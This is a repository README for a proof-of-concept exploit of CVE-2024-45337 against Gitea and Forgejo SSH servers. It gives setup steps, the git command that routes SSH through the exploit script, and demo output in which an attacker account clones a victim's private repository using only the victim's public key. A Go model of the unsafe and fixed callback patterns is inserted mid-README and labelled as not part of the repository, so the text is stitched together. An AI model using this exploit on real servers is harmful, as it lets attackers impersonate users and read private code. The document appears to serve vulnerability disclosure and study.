Description
Proof of Concept for CVE-2024-45337 against Gitea and Forgejo
Introduction
Proof of Concept exploit for CVE-2024-45337
===
This repository contains a proof of concept exploit for [CVE-2024-45337](https://nvd.nist.gov/vuln/detail/CVE-2024-45337).
It can be used to wrap `ssh` when interacting with an SSH server that is implemented using `golang.org/x/crypto` <= v0.30.0 and caches permissions in the `ServerConfig.PublicKeyCallback` callback in an unsafe manner.
Gitea <= 1.22.4 and Forgejo <= 7.0.11, 9.0.2 are vulnerable when hosted using the internal SSH server. You can impersonate any user as long as you know any of the public keys associated with their account; you need an account of your own that you use for SSH authentication.
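The unsafe caching pattern described above, beside the fix the x/crypto advisory recommends, as an added example that is not part of this repository: a small Go model of the server's publickey loop, in which the `Permissions`, `authRequest`, `keyID`, `authenticate`, `unsafeServer`, `safeCallback` and `scenario` names are constructed here and the loop is a stand-in for, not the code of, `golang.org/x/crypto/ssh`. Only the value the callback returns survives the handshake; external state records whichever key the client merely asked about.

```go
package main

import (
	"crypto/ed25519"
	"crypto/rand"
	"encoding/hex"
	"errors"
)

// Constructed stand-in for the Permissions type of golang.org/x/crypto/ssh (NOT the real package).
type Permissions struct{ Extensions map[string]string }
// A request is a query ("is this key acceptable?", Sig == nil) or a signed proof of control.
type authRequest struct{ Key ed25519.PublicKey; Sig []byte }
var sessionID = []byte("constructed-session-id") // stands in for the SSH session identifier
func keyID(k ed25519.PublicKey) string { return hex.EncodeToString(k[:8]) }
// Model of the pre-v0.31.0 loop: callback once per distinct key (cached); the connection gets the Permissions returned for the key whose signature verified.
func authenticate(cb func(ed25519.PublicKey) (*Permissions, error), reqs []authRequest) (*Permissions, error) {
	cache := map[string]*Permissions{}
	for _, r := range reqs {
		id := keyID(r.Key)
		perms, seen := cache[id]
		if !seen {
			p, err := cb(r.Key)
			if err != nil { continue } // key rejected; the client may offer another
			perms, cache[id] = p, p
		}
		if r.Sig != nil && ed25519.Verify(r.Key, sessionID, r.Sig) {
			return perms, nil
		}
	}
	return nil, errors.New("publickey authentication failed")
}

// Unsafe pattern: remember the last key offered in external state and authorize from it later.
type unsafeServer struct{ lastOffered string }
func (s *unsafeServer) callback(k ed25519.PublicKey) (*Permissions, error) { s.lastOffered = keyID(k); return &Permissions{}, nil }

// Safe pattern: bind the key to the returned Permissions, which the real package hands back as ServerConn.Permissions after the handshake.
func safeCallback(k ed25519.PublicKey) (*Permissions, error) {
	return &Permissions{Extensions: map[string]string{"pubkey-id": keyID(k)}}, nil
}

// Replays the advisory's sequence (query A, query B, sign with A only); returns the key each pattern would authorize plus the key that actually signed.
func scenario() (unsafeView, safeView, signer string) {
	pubA, privA, _ := ed25519.GenerateKey(rand.Reader)
	pubB, _, _ := ed25519.GenerateKey(rand.Reader)
	reqs := []authRequest{{pubA, nil}, {pubB, nil}, {pubA, ed25519.Sign(privA, sessionID)}}
	u := &unsafeServer{}
	authenticate(u.callback, reqs)
	p, _ := authenticate(safeCallback, reqs)
	return u.lastOffered, p.Extensions["pubkey-id"], keyID(pubA)
}
```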
## Run the PoC
1. Start a vulnerable Forgejo or Gitea instance. The Gitea Docker images aren't vulnerable, so for Gitea you'll have to run a native binary.
```shell
docker compose -f docker-compose.forgejo.yml up -d
```
2. Run the installer at http://localhost:3000, changing the SSH port to 22
3. Register a `victim` user
   1. Add the victim's public key to the account on http://localhost:3000/user/settings/keys
   2. Create a private repository called `important_repo` and generate an initial commit with a README so you have something to clone
4. Register an `attacker` user
   1. Add the attacker's public key to the account on http://localhost:3000/user/settings/keys
5. Clone the repository using the attacker's account
   1. Set `GIT_ATTACK_PRIVKEY` to the path of the private key of a valid account
   2. Set `GIT_ATTACK_PUBKEY` to the path of a known public key of the target account. We don't know the private key for that one.
   3. Set `GIT_SSH` to the path of the exploit script to tell `git` to use it instead of the native `ssh` command
```shell
GIT_ATTACK_PRIVKEY=./id_ed25519_attacker GIT_ATTACK_PUBKEY=./id_ed25519_victim.pub GIT_SSH_VARIANT=ssh GIT_SSH=./ssh_cve-2024-45337.py git clone ssh://git@localhost:222/victim/important_repo.git
```
## Demo
Use `.ssh/config` to specify keys during cloning
```
Host sshvictim
Hostname localhost
Port 222
User git
IdentityFile /path/to/id_ed25519_victim
IdentitiesOnly yes
Host sshattacker
Hostname localhost
Port 222
User git
IdentityFile /path/to/id_ed25519_attacker
IdentitiesOnly yes
```
Run against a local Forgejo 7.0.11 container set up as described above.
```
$ ssh-keygen -t ed25519 -f id_ed25519_victim
$ ssh-keygen -t ed25519 -f id_ed25519_attacker
$ git clone sshattacker:victim/important_repo.git
Cloning into 'important_repo'...
Forgejo: User: 2:attacker with Key: 2:attacker is not authorized to read victim/important_repo.
fatal: Could not read from remote repository.
Please make sure you have the correct access rights
and the repository exists.
$ git clone sshvictim:victim/important_repo.git
Cloning into 'important_repo'...
remote: Enumerating objects: 3, done.
remote: Counting objects: 100% (3/3), done.
remote: Total 3 (delta 0), reused 0 (delta 0), pack-reused 0
Receiving objects: 100% (3/3), done.
# Delete private key of victim for demo purposes
$ rm -rf important_repo id_ed25519_victim
$ GIT_ATTACK_PRIVKEY=./id_ed25519_attacker GIT_ATTACK_PUBKEY=./id_ed25519_victim.pub GIT_SSH_VARIANT=ssh GIT_SSH=./ssh_cve-2024-45337.py git clone ssh://git@localhost:222/victim/important_repo.git
Cloning into 'important_repo'...
remote: Enumerating objects: 3, done.
remote: Counting objects: 100% (3/3), done.
remote: Total 3 (delta 0), reused 0 (delta 0), pack-reused 0
Receiving objects: 100% (3/3), done.
```
File snapshot
[4.0K] /data/pocs/cea1d6618a64a2448634c85ddf812e928de34e30
├── [ 463] docker-compose.forgejo.yml
├── [3.4K] README.md
├── [ 16] requirements.txt
└── [6.1K] ssh_cve-2024-45337.py
0 directories, 4 files